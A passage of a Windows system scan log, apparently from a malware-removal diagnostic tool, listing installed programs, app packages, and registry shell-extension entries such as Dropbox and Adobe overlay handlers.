Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27033 (HKLM-x32\...\{624ba875-fdfc-4efa-9c66-b170dfebc3ec}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1104.625 - Microsoft Corporation)
MMFonts (HKLM-x32\...\{1DD5D3E6-8DF5-4657-8825-713C499CDCC0}) (Version: 1.1.1.1 - MakeMusic, Inc.)
Mozilla Firefox 61.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 61.0.2 (x86 en-US)) (Version: 61.0.2 - Mozilla)
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0.2 - Mozilla)
Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich)
MSI Development Tools (HKLM-x32\...\{577FB968-1AAC-A315-93D6-419725A69F36}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments)
Network Addon Mod (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Network Addon Mod) (Version: 36 - The NAM Team)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
NovaGOPlayer 7.3.3 (HKLM-x32\...\89399A59-11C3-4EBC-A59E-FBD13021BC07_is1) (Version: 7.3.3 - Forthnet Media SA)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.15 - NVIDIA Corporation) Hidden
NVIDIA 3D Vision Controller Driver 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 397.93 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.19.0.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.19.0.94 - NVIDIA Corporation)
NVIDIA Graphics Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 397.93 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OANDA - MetaTrader (HKLM-x32\...\OANDA - MetaTrader) (Version: 4.00 - MetaQuotes Software Corp.)
OANDA Desktop (HKLM-x32\...\{1DAF3BB8-E27F-4698-9D7C-270985AA3BCE}) (Version: 2.6.3 - OANDA)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0408-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) Hidden
PACE License Support Win64 (HKLM-x32\...\InstallShield_{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.)
PCM Native Reverb VST Plug-in (HKLM-x32\...\{B4691C58-2A6A-4AFA-960E-AEB767639E44}) (Version: 1.0.0 - Lexicon) Hidden
PCM Native Reverb VST Plug-in (HKLM-x32\...\PCM Native Reverb VST Plug-in) (Version: - Lexicon)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.2 - pdfforge GmbH)
PMDG 737 8900 NGX Base Package FSX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.10.6436 - PMDG Simulations, LLC.)
PureSync (HKLM-x32\...\{728DB5F9-AFAC-4027-B0A0-4194D89328E4}) (Version: 4.7.3 - Jumping Bytes)
qBittorrent 4.1.6 (HKLM-x32\...\qBittorrent) (Version: 4.1.6 - The qBittorrent project)
Quick Search 5.28.1.101 (HKLM-x32\...\Quick Search) (Version: 5.28.1.101 - Glarysoft Ltd)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RapidMiner Studio (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\RapidMiner Studio) (Version: 7.6.1.0 - RapidMiner)
RealAir Turbine Duke (HKLM\...\Turbine Duke07.1.10.35) (Version: 07.1.10.35 - RealAir Simulations)
Revolution DB Master 19 Beta 1 (HKLM-x32\...\Revolution DB Master 19_is1) (Version: - FIFA MASTER)
REX 4 - Weather Architect (HKLM-x32\...\{1D59EFDF-0A58-4FF9-A468-A1190F1FAFEB}) (Version: 4.0.2015.0717 - REX Game Studios, LLC.)
rtpMIDIBlockLegacy (HKLM-x32\...\{FD937297-84C3-41A5-B5DF-1FAEEE669D68}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden
Sandboxie 5.30 (64-bit) (HKLM\...\Sandboxie) (Version: 5.30 - Sandboxie Holdings, LLC)
Scid vs PC 4.18 (HKLM-x32\...\Scid vs PC_is1) (Version: 4.18 - Steven Atkinson)
Screen Protractor (HKLM-x32\...\Screen Protractor) (Version: 4.0 - Iconico)
SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
SimCity 4 Deluxe Edition (HKLM-x32\...\GOGPACKSC4_is1) (Version: 2.0.0.8 - GOG.com)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - Krzysztof Kowalczyk)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
teVirtualMIDI64 (HKLM\...\{9084640A-366B-4C44-BDB1-74864B460B13}) (Version: 1.2.10.38 - Tobias Erichsen) Hidden
thinkorswim (HKLM\...\9968-4488-2169-7623) (Version: desktop - thinkorswim, Inc)
Traffic Simulator Configuration Tool (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Traffic Simulator Configuration Tool) (Version: - )
TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden
UltraSearch V2.3 (64 bit) (HKLM\...\UltraSearch_is1) (Version: 2.3 - JAM Software)
Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS)
Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{BE2D1829-B45D-4D78-BF02-4076B86AC57C}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{A46D1F7A-BA32-2375-EF97-4975E594A7E7}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{413A1F9C-9349-4847-610E-BAB177A48ADE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{E2EA2702-534B-D6C1-5AC4-724E3CE7B2D9}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal Patch Finder version 1.5 (HKLM-x32\...\{88FBB3D2-C9A5-41E4-88B8-3F4F1722E7D1}_is1) (Version: 1.5 - Hypercube Softwares)
Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9C4F3AF4-21D8-43BD-A69C-517BB96012CF}) (Version: 2.12.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM-x32\...\{B302EECB-0DA5-46E6-8A58-127440F22CF1}) (Version: 1.7.0.0 - Microsoft Corporation) Hidden
VBSBeautifier (remove only) (HKLM-x32\...\VBSBeautifier) (Version: - )
vcpp_crt.redist.clickonce (HKLM-x32\...\{253D6AD3-5786-4B3B-B4E1-E082482A1F26}) (Version: 14.16.27033 - Microsoft Corporation) Hidden
VeraCrypt (HKLM-x32\...\VeraCrypt) (Version: 1.21 - IDRIX)
Viber (HKLM-x32\...\{32AF88A9-E104-4306-8B68-CB92FFD2CAD6}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Hidden
Viber (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\{9097b5b3-1f2b-4ff7-a350-97a76bb76fb8}) (Version: 11.0.0.42 - Viber Media S.a.r.l)
Visual Studio Community 2017 (HKLM-x32\...\fba7c5bd) (Version: 15.9.28307.905 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VoiceBot 3.0 (HKLM-x32\...\2BB5202A-885B-454F-8624-FD3310CD3225_is1) (Version: 3.0.0.0 - Binary Fortress Software)
VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Weka 3.8.3 (HKLM\...\Weka 3.8.3) (Version: 3.8.3 - Machine Learning Group, University of Waikato, Hamilton, NZ)
WinAppDeploy (HKLM-x32\...\{03343DEA-224B-E9B6-1FBB-E637E6BC6BAA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinAutomation (HKLM\...\{67F5E390-8E09-4AE4-B7F2-705AFD23D86D}) (Version: 6.0.2.4227 - Softomotive Ltd) Hidden
WinAutomation (HKLM-x32\...\WinAutomation) (Version: 6.0.2.4227 - Softomotive Ltd)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22211 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{E1C6F438-7C50-41F5-8B47-3CC96D397CA3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - )
Windows Software Development Kit - Windows 10.0.15063.674 (HKLM-x32\...\{6824cee4-b358-4633-b82c-5f20894af8e2}) (Version: 10.1.15063.674 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D8AA52A2-81E2-BB84-AAF9-C487C586CC15}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{5715A2A6-E637-81E3-464D-3F0F999E506A}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{2B8614A6-D0C1-CFE0-9311-7AF9227DC9BA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{409D68FF-37DD-F8F4-A60F-30BEAA4AA4CE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{3617F573-CF51-0F5A-063F-B272F98D0522}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{FDE59EF8-D43D-F9DA-5B0C-CC9C90DB0335}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{87CC4887-0873-F87B-D804-6A78B07DC1F5}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{D62E0DD5-9853-C09C-AE15-D02988503C60}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
wxWidgets 3.0.4 (HKLM-x32\...\wxWidgets_is1) (Version: - wxWidgets)
X-Mouse Button Control 2.18.8 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.18.8 - Highresolution Enterprises)
ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic)
Packages:
=========
Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12228.20206.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.33.13094.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) [MS Ad]
Microsoft Phone Companion -> C:\Program Files\WindowsApps\Microsoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe [2018-11-13] (Microsoft Corporation)
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.11052.0_x64__8wekyb3d8bbwe [2019-11-10] (Microsoft Studios) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.33.13253.0_x64__8wekyb3d8bbwe [2019-11-23] (Microsoft Corporation) [MS Ad]
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{23066764-9BDD-4FBD-8B1F-F4547CF2684F}\InprocServer32 -> C:\Users\SR\AppData\Local\Microsoft\OneDrive\18.070.0405.0002\amd64\FileSyncShell64.dll => No File
CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\SR\Dropbox [2018-01-03 12:23]
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
